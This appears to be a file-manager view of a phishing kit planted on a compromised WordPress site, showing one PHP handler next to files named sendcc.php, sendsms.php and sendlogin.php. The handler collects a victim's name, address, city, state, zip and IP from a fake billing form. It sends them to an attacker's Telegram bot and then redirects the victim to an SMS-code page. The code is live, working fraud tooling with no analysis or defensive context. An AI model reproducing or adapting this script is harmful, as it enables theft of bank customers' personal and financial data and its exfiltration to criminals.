PATH:
home
/
thebhoeo
/
wp-admiin
/
page
/
ses
<?php error_reporting(0); session_start(); include "../config.php"; $ip = getenv("REMOTE_ADDR"); $link = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'] ; $ph = str_replace(' ', '', $_POST['phone']); $_SESSION["ph"] = $ph; $_SESSION["name"]= $_POST['First-Name']." ".$_POST['Last-Name']; $hostname = gethostbyaddr($ip); $message = "[========== ❄️ UBB BY HTXTN RZLT(Billing) ❄️ ===========]\r\n"; $message .= "|Full Name : ".$_POST['firstname']."\r\n"; $message .= "|Adress : ".$_POST['address']."\r\n"; $message .= "|City : ".$_POST['city']."\r\n"; $message .= "|State : ".$_POST['state']."\r\n"; $message .= "|zip : ".$_POST['zip']."\r\n"; $message .= "[========= $ip ========]\r\n"; file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=" . urlencode($message)."" ); echo"<script>location.replace('../pagesms.php');</script>"; ?>
[-] senderror.php
[edit]
[-] sendsms.php
[edit]
[-] sendlogin.php
[edit]
[+]
..
[-] sendinfo.php
[edit]
[-] sendcc.php
[edit]